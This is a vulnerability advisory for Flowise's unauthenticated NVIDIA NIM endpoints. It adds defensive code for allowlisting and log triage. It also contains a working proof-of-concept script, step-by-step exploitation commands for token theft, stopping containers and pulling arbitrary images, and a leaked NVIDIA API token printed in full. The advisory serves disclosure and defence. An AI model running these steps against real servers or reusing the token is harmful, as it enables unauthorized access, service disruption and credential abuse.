Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router…
GitHub_M·CWE-306·Published 2026-03-06
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.
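The whitelist behaviour described above can be modelled in a few lines. This is an added example, not Flowise's own middleware: `WHITELIST_URLS` and the `/api/v1/nvidia-nim` entry are taken from the advisory, while the function names, the `/api/v1/ping` entry and the matching rules are assumptions made for illustration. It compares a prefix whitelist with a default-deny exact-match allowlist and audits which of the advisory's nine endpoints each policy leaves unauthenticated.

```typescript
// Added example: simplified model of a prefix-based auth whitelist.
// WHITELIST_URLS and '/api/v1/nvidia-nim' come from the advisory; the function
// names, '/api/v1/ping' and the matching rules are hypothetical and are not
// Flowise's actual middleware.
type Decision = 'skip-auth' | 'require-auth'

// "Before": the whole router prefix is whitelisted.
const WHITELIST_URLS: string[] = ['/api/v1/ping', '/api/v1/nvidia-nim']

// "After": only genuinely public routes remain, matched exactly.
const PUBLIC_EXACT: string[] = ['/api/v1/ping']

// Normalize so case, query strings and duplicate or trailing slashes cannot change the match.
function normalizePath(rawUrl: string): string {
    const q = rawUrl.indexOf('?')
    const bare = (q === -1 ? rawUrl : rawUrl.slice(0, q)).toLowerCase().replace(/\/{2,}/g, '/')
    return bare.length > 1 ? bare.replace(/\/+$/, '') : bare
}

// Vulnerable pattern: any path under a whitelisted prefix bypasses authentication.
function decidePrefix(rawUrl: string): Decision {
    const path = normalizePath(rawUrl)
    const hit = WHITELIST_URLS.some((p) => path === p || path.indexOf(p + '/') === 0)
    return hit ? 'skip-auth' : 'require-auth'
}

// Hardened pattern: default deny, exact-match allowlist only.
function decideExact(rawUrl: string): Decision {
    const path = normalizePath(rawUrl)
    return PUBLIC_EXACT.some((p) => p === path) ? 'skip-auth' : 'require-auth'
}

// Audit helper: which routes would a given policy leave unauthenticated?
function exposedRoutes(routes: string[], decide: (u: string) => Decision): string[] {
    return routes.filter((r) => decide(r) === 'skip-auth')
}

// Endpoints listed in the advisory's "Affected Endpoints" table.
const NIM_ROUTES: string[] = [
    'get-token', 'preload', 'download-installer', 'list-running-containers',
    'pull-image', 'start-container', 'stop-container', 'get-image', 'get-container'
].map((name) => '/api/v1/nvidia-nim/' + name)

console.log('prefix whitelist exposes:', exposedRoutes(NIM_ROUTES, decidePrefix).length)
console.log('exact allowlist exposes:', exposedRoutes(NIM_ROUTES, decideExact).length)
```

Running an audit like `exposedRoutes` over the real route table in CI turns an accidental whitelist entry into a failing test rather than a shipped bypass.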
# Missing Authentication on NVIDIA NIM Endpoints

## Summary

The NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.

## Vulnerability Details

| Field | Value |
|-------|-------|
| CWE | CWE-306: Missing Authentication for Critical Function |
| Affected File | `packages/server/src/utils/constants.ts` |
| Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) |
| CVSS 3.1 | 8.6 (High) |

## Root Cause

In `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist:

```typescript
export const WHITELIST_URLS = [
    // ... other URLs
    '/api/v1/nvidia-nim',  // Line 20 - bypasses JWT/API-key validation
    // ...
]
```

This causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks.

## Affected Endpoints

| Method | Endpoint | Risk |
|--------|----------|------|
| GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token |
| GET | `/api/v1/nvidia-nim/preload` | Resource consumption |
| GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption |
| GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure |
| POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull |
| POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start |
| POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service |
| POST | `/api/v1/nvidia-nim/get-image` | Information disclosure |
| POST | `/api/v1/nvidia-nim/get-container` | Information disclosure |

## Impact

### 1. NVIDIA API Token Leakage

The `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.

**Token obtained:**

```json
{
  "access_token": "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",
  "token_type": "Bearer",
  "expires_in": 3600
}
```

**Token validation:**

```bash
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models
```

### 2. Container Runtime Manipulation

On systems with Docker/NIM installed, an unauthenticated attacker can:

- List running containers (reconnaissance)
- Stop containers (Denial of Service)
- Start containers with arbitrary images
- Pull arbitrary Docker images (resource consumption, potential malicious images)

## Proof of Concept

### poc.py

```python
#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated

Usage:
  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.request
import urllib.error


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    main()
```

<img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" />

### Exploitation Steps

```bash
# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data '{"containerId":"<target_id>"}'

# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'
```

### Evidence

**Token retrieval without authentication:**

```
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}
```

**Token grants access to NVIDIA API:**

```
$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}
```

**Container endpoints return 500 (not 401) proving auth bypass:**

```
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}
```

## References

- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)
- [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)
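The Evidence section's observation that a 500 rather than a 401 shows the controller ran can be turned into a log triage for instances that were exposed before upgrading to 3.0.13. This is an added example, not part of the advisory or of Flowise: it assumes a reverse proxy writing common log format, and the sample lines, addresses and function names are constructed for illustration.

```typescript
// Added example: triage of reverse-proxy access logs for requests that reached
// the NIM router without being rejected. The log format (common log format),
// the sample lines and all function names are constructed or hypothetical.
interface Hit { ip: string; method: string; path: string; status: number }
interface Summary { ip: string; requests: number; tokenIssued: boolean }

const NIM_PREFIX = '/api/v1/nvidia-nim/'
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) /

// Parse one line; return null for anything that is not a NIM-router request.
function parseNimHit(line: string): Hit | null {
    const m = LINE_RE.exec(line)
    if (!m) return null
    const url = String(m[3]).toLowerCase()
    const q = url.indexOf('?')
    const path = q === -1 ? url : url.slice(0, q)
    if (path.indexOf(NIM_PREFIX) !== 0) return null
    return { ip: String(m[1]), method: String(m[2]), path: path, status: Number(m[4]) }
}

// 401/403 means the request was rejected before the controller; any other
// status (including the 500 shown in the advisory's evidence) means it ran.
function reachedHandler(h: Hit): boolean {
    return h.status !== 401 && h.status !== 403
}

// Per-client summary; tokenIssued marks a 200 from get-token, i.e. a credential to rotate.
function triage(lines: string[]): Summary[] {
    const byIp: { [ip: string]: Summary } = {}
    for (const line of lines) {
        const h = parseNimHit(line)
        if (!h || !reachedHandler(h)) continue
        const s = byIp[h.ip] || (byIp[h.ip] = { ip: h.ip, requests: 0, tokenIssued: false })
        s.requests += 1
        if (h.path === NIM_PREFIX + 'get-token' && h.status === 200) s.tokenIssued = true
    }
    return Object.keys(byIp).sort().map((ip) => byIp[ip])
}

// Constructed sample lines (documentation address ranges).
const SAMPLE_LOG: string[] = [
    '203.0.113.7 - - [06/Mar/2026:10:00:01 +0000] "GET /api/v1/nvidia-nim/get-token HTTP/1.1" 200 171',
    '203.0.113.7 - - [06/Mar/2026:10:00:02 +0000] "GET /api/v1/nvidia-nim/list-running-containers HTTP/1.1" 500 98',
    '198.51.100.4 - - [06/Mar/2026:10:05:00 +0000] "POST /api/v1/nvidia-nim/stop-container HTTP/1.1" 401 24',
    '198.51.100.9 - - [06/Mar/2026:10:06:00 +0000] "GET /api/v1/chatflows HTTP/1.1" 200 512'
]
console.log(JSON.stringify(triage(SAMPLE_LOG)))
```

Any client with `tokenIssued` set received a usable NVIDIA API token, so the corresponding NVIDIA credential should be rotated in addition to upgrading.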
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | NVD | 9.8 | 3.9 | 5.9 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 4.0 | Primary | cve.org | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N |
| 4.0 | Secondary | NVD | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| 4.0 | Secondary | GHSA | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N |